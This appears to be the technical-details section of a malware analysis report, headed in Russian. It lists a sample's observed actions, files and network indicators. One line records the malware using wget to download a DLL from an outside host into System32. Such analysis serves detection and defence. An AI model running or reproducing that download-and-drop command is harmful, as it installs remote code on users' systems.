Техническая информация
- '<SYSTEM32>\wget.exe' -q http://is#n.cn/BarclientALL/ZJ/ZJconfig.dll -O <SYSTEM32>\config.dll
- '<SYSTEM32>\svcshost.exe'
- '<SYSTEM32>\findstr.exe' /i "hooktime" <SYSTEM32>\mybar.ini
- '<SYSTEM32>\findstr.exe' /i "barpath" <SYSTEM32>\mybar.ini
- %TEMP%\bt07151.bat
- <SYSTEM32>\wget.exe
- <SYSTEM32>\svcshost.exe
- %TEMP%\bt07151.bat
- 'is#n.cn':80
- is#n.cn/BarclientALL/ZJ/ZJconfig.dll
- DNS ASK is#n.cn
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'